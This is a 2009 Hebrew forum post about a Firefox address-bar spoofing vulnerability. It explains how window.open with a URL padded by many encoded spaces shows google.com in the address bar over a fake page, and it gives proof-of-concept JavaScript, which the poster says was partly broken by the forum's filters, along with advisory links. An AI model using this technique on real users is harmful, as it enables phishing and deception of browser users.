Mozilla Firefox URL Processing Address Bar Spoofing Vulnerability
פשוט התווים בכותרת מעטים מדי.. :)
בחור נחמד מארגנטינה בשם Juan Pablo Lopez Yacubian מצא דרך לבצע URL SPOOFINF - הכוונה היא שאתה רואה בשורת הURL (שורת ה Address Bar) כתובת מסויימת, אך בתוכן של העמוד אתה רואה מידע שונה, הדבר מאפשר לבצע פישינג מתוחכם על משתמשי FIREFOX.
אופן המתקפה מתבצע כך שהתוקף שולח את המשתמש לעמדוד שמשתמש בפונקציה "window.open".
לפונקציה, התוקף מכניס את כתובת הURL שהוא רוצה שתופיע בAddress Bar ואחריה מספר רב של "%20" - רווח (כך שיעלם מטווח חלון ה- Address Bar, ולאחריו הוא מוסיף פסיק
לאחר מכן הוא מכניס לתוכן העמוד את מה שברצונו שהקורבן יראה.
קוד לדוגמא:
קוד:
<p>
<a href="jscriptspoof()">test!</a>
<p>
<script>
function spoof()
{
a = window.open("http://www.google.com%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20,")
a.document.write("<H1>FAKE PAGE<\h1>")
a.document.write("<title>test</title>")
a.stop ();
}
משתמשי מוזילה שילחצו על קישור המכיל את הקוד הנ"ל יראו בשורת הכתובת שהם נמצאים בגוגל, אך תוכנו של העמוד יהיה "FAKE PAGE".
עמוד PoC שJuan Pablo Lopez Yacubian הכין:
http://es.geocities.com/jplopezy/firefoxspoofing.html
לפרסום בVUPEN:
http://www.vupen.com/english/advisories/2009/2006
עריכה:
אחרי הפרסום של הקוד אני רואה שחלק מהקוד נהרס בגלל כמה הגנות ששחף עשה במערכת, בשביל לראות את הקוד המלא פשוט מאוד תכנסו לעמוד שהבחור הכין ותראו את ה- Source.[ההודעה נערכה על-ידי cp77fk4r ב-28/07/2009 20:58:25]